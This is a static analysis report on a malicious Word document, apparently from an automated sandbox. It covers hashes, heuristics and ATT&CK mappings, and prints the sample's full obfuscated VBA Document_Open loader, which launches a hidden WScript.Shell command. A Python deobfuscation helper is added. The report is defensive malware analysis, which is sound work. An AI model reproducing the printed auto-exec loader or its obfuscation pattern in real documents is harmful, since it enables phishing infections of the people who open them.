Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6bfd1b9c829f8a7c…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 34.5 KB
Created: 2018-10-18 23:18:00
Authoring application: Microsoft Office Word
First seen: 2019-03-18
MD5: 3e43dcbbc8f1189b45e1cadc1d6bf668
SHA-1: e397cf4f8d4b263db40a0355e974c9bcb4acde92
SHA-256: 6bfd1b9c829f8a7cc70e598b9dc3133b2e7be0a4d518b26d4d40cb326eb7b2bb
Risk Score: 302

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains a heavily obfuscated VBA macro with a Document_Open auto-execution handler, so the loader runs as soon as the document is opened with macros enabled. The handler's only logic is a Select Case on a constant selector (YXYG_ = 15) whose arms are junk arithmetic; none of the arms evaluates to 15, so control always falls through to Case Else. That branch calls CallByName on the result of CreateObject, with both the COM ProgID and the method name produced at run time by the helper C_, which parses each two-character slice of its argument as a hex byte and subtracts 15. Applying that decoder to the two literals in the source gives the ProgID "WScript.Shell" and the method "Run". The command handed to Run is the decoded value of the document variable JUJIGI (ActiveDocument.Variables), which is stored in the document rather than in the macro stream, so the command itself is not visible in the extracted VBA; the trailing arguments 0 and True make it execute in a hidden window and block until it returns. The ClamAV detection Doc.Malware.Valyria-6749505-0 corroborates the verdict. The loader shape is consistent with a downloader for a second-stage payload, but confirming that requires recovering the JUJIGI variable from the document itself.

Heuristics (8)

  • ClamAV: Doc.Malware.Valyria-6749505-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Valyria-6749505-0
  • VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings)
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This loader shape keeps the ProgID, method name, shell command and URL indicators out of the macro source as literals. In this sample the decoder is the hex-pair helper C_ and the sink is CallByName on a CreateObject result.
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    Document_Open runs automatically when the document is opened with macros enabled, so the loader needs no user interaction beyond the macro-enable prompt.
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
    CreateObject instantiates a COM object from a ProgID string; here the ProgID is produced by the decoder rather than written as a literal.
  • CallByName call (high, OLE_VBA_CALLBYNAME)
    CallByName invokes a member whose name is supplied as a string at run time, so the method name is also hidden behind the decoder and never appears in the source.
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace and is expected in Office content; it is not a download or C2 indicator.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2636 bytes
SHA-256: c1a8eaf8f7e5fcc5ad3e9bb699b1250cd9b1d8b8cf5876e33b748202843bb3a1

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Function C_(ByVal OK_ As String)
Dim WPX_ As String: Dim JD_ As Long: For JD_ = 1 To Len(OK_) Step 2: WPX_ = WPX_ & Chr(Val(Chr(23 + (9 * 2) - (1 * 3)) & Chr((20 * 3) + 16 - (24 / 2) + 8) & Mid(OK_, JD_, 2)) - 15): Next: C_ = WPX_
End Function
Sub Document_Open()
Dim YXYG_ As Long: YXYG_ = 15
Dim YRPCYPII_ As Long
Select Case YXYG_
Case 33 - (65 + 15) - 62 * Round(50 / 27 - 11) * 99 * Round(83 / 17 - 50) * 99
YRPCYPII_ = 2827 / 35
Case 85 - (68 + 41) - 45 + (75 - 88) + 51 * Round(79 / 19 - 66) * 58
YRPCYPII_ = 783 + 36
Case 77 - (10 + 16) - 80 / Round(85 * 84 / 98) / 28 * Round(67 / 93 - 18) * 33
YRPCYPII_ = 1234 - 19
Case 82 - (40 + 41) - 87 * Round(16 / 94 - 98) * 29 + (40 - 38) + 46
YRPCYPII_ = 8768 + 66
Case 34 - (99 + 64) - 69 / Round(24 * 60 / 66) / 34 * Round(79 / 48 - 84) * 93
YRPCYPII_ = 1482 / 34
Case 46 * Round(78 / 94 - 85) * 32 + (79 - 16) + 12
YRPCYPII_ = 8122 - 31
Case 87 / Round(46 * 63 / 50) / 62 * Round(98 / 13 - 11) * 76
YRPCYPII_ = 7727 + 66
Case 17 / Round(88 * 18 / 92) / 29 * Round(59 / 69 - 70) * 59
YRPCYPII_ = 6270 - 36
Case 55 / Round(49 * 20 / 19) / 44 + (38 - 40) + 37
YRPCYPII_ = 297 - 83
Case 40 / Round(12 * 86 / 25) / 14 + (97 - 88) + 47 - (38 + 24) - 16
YRPCYPII_ = 4338 + 67
Case 80 + (73 - 91) + 27 - (66 + 29) - 75
YRPCYPII_ = 3038 - 37
Case 69 / Round(54 * 17 / 22) / 55 * Round(97 / 10 - 21) * 23 / Round(61 * 65 / 61) / 26
YRPCYPII_ = 7346 + 34
Case 77 - (68 + 72) - 45 / Round(86 * 43 / 83) / 53
YRPCYPII_ = 1398 * 67
Case 83 / Round(25 * 14 / 22) / 17 + (60 - 76) + 31 / Round(56 * 72 / 90) / 76
YRPCYPII_ = 7461 / 76
Case 96 - (80 + 74) - 54 - (91 + 59) - 57 + (40 - 70) + 72
YRPCYPII_ = 2277 - 57
Case 33 + (50 - 36) + 80 - (36 + 85) - 18
YRPCYPII_ = 8205 / 14
Case 42 * Round(15 / 17 - 85) * 71 / Round(52 * 41 / 28) / 13 * Round(49 / 27 - 43) * 71
YRPCYPII_ = 2213 - 47
Case 53 * Round(74 / 47 - 90) * 22 * Round(92 / 28 - 88) * 71
YRPCYPII_ = 6829 - 96
Case 56 - (43 + 41) - 55 * Round(89 / 55 - 34) * 62 + (95 - 10) + 62
YRPCYPII_ = 2107 / 86
Case 39 * Round(20 / 61 - 71) * 77 * Round(32 / 55 - 52) * 82 - (18 + 73) - 17
YRPCYPII_ = 7014 + 67
Case Else: CallByName CreateObject(C_("66627281787F833D6277747B7B")), C_("61847D"), VbMethod, C_(ActiveDocument.Variables("JUJIGI").Value), 0, True
End Select
End Sub
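The decoder and the opaque-predicate Select Case described in the Malware Insights summary and in the OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER finding can be worked through offline. The Python below is an added example written for this report; it is not part of the sample and not tooling from the analysis pipeline that produced the page. It re-implements the macro's C_ helper, evaluates the Select Case guards with a whitelisting AST walker instead of eval (VBA's Round with no digits argument and Python's round both round half to even, and "/" is floating-point division in both, so the arithmetic transfers unchanged), and rewrites the sink line with the decoded literals. The guard list is a subset of the arms copied from the extracted source above; the remaining arms evaluate the same way and none of them equals the selector.

```python
"""Deobfuscation helpers for the Document_Open loader shown above.

Added example for this report: not part of the sample, not pipeline tooling.
Re-implements the macro's C_() decoder, evaluates the junk "Case" guards
safely, and rewrites the sink line with the decoded literals.
"""
import ast
import re

# --- 1. The string decoder -------------------------------------------------
# C_() builds Chr(23 + 9*2 - 1*3) & Chr(20*3 + 16 - 24/2 + 8) = "&" & "H", so
# each two-character slice is parsed as a VBA hex literal, 15 is subtracted,
# and the result is turned back into a character.
def decode_c(hex_blob: str) -> str:
    out = []
    for i in range(0, len(hex_blob), 2):
        pair = hex_blob[i:i + 2]
        out.append(chr(int(pair, 16) - 15))   # Chr(Val("&H" & pair) - 15)
    return "".join(out)

# --- 2. Safe evaluation of the junk "Case" arithmetic ----------------------
# The guards use only + - * / and Round(). eval() on attacker-controlled text
# is never acceptable, so walk the parsed AST and permit exactly those nodes.
_ALLOWED_BINOPS = {
    ast.Add: lambda a, b: a + b,
    ast.Sub: lambda a, b: a - b,
    ast.Mult: lambda a, b: a * b,
    ast.Div: lambda a, b: a / b,    # VBA "/" is floating-point, like Python's
}

def _eval_node(node):
    if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in _ALLOWED_BINOPS:
        return _ALLOWED_BINOPS[type(node.op)](_eval_node(node.left),
                                              _eval_node(node.right))
    if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
        return -_eval_node(node.operand)
    if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
            and node.func.id == "Round" and len(node.args) == 1):
        # VBA Round(x) with no digits argument rounds half to even, as round() does
        return round(_eval_node(node.args[0]))
    raise ValueError(f"disallowed construct in guard: {ast.dump(node)}")

def eval_vba_arith(expr: str) -> float:
    """Evaluate a VBA arithmetic guard consisting of numbers, + - * / and Round()."""
    return _eval_node(ast.parse(expr.strip(), mode="eval").body)

def reachable_cases(selector: float, guards) -> list:
    """Return the guard expressions whose value equals the Select Case selector."""
    return [g for g in guards if eval_vba_arith(g) == selector]

# --- 3. Rewrite the sink line with decoded literals ------------------------
_C_CALL = re.compile(r'C_\("([0-9A-Fa-f]+)"\)')

def deobfuscate_line(line: str) -> str:
    """Replace every C_("<hex>") call in a source line with its decoded string."""
    return _C_CALL.sub(lambda m: '"' + decode_c(m.group(1)) + '"', line)

# Copied from the extracted macro above (a subset of the 20 Case arms).
SINK_LINE = ('Case Else: CallByName CreateObject(C_("66627281787F833D6277747B7B")), '
             'C_("61847D"), VbMethod, C_(ActiveDocument.Variables("JUJIGI").Value), 0, True')
SELECTOR = 15   # YXYG_ = 15
GUARDS = [
    "33 - (65 + 15) - 62 * Round(50 / 27 - 11) * 99 * Round(83 / 17 - 50) * 99",
    "85 - (68 + 41) - 45 + (75 - 88) + 51 * Round(79 / 19 - 66) * 58",
    "80 + (73 - 91) + 27 - (66 + 29) - 75",
    "33 + (50 - 36) + 80 - (36 + 85) - 18",
    "83 / Round(25 * 14 / 22) / 17 + (60 - 76) + 31 / Round(56 * 72 / 90) / 76",
]

if __name__ == "__main__":
    print(deobfuscate_line(SINK_LINE))
    print("guards matching the selector:", reachable_cases(SELECTOR, GUARDS))
```

Running the module rewrites the sink as CallByName CreateObject("WScript.Shell"), "Run", VbMethod, C_(ActiveDocument.Variables("JUJIGI").Value), 0, True and reports no guard equal to 15, which is why Case Else is the only live branch. The third C_ argument is deliberately left untouched: its input is the JUJIGI document variable, which is stored in the document rather than the macro stream, so decode_c can only be applied to it after that variable has been recovered from the file.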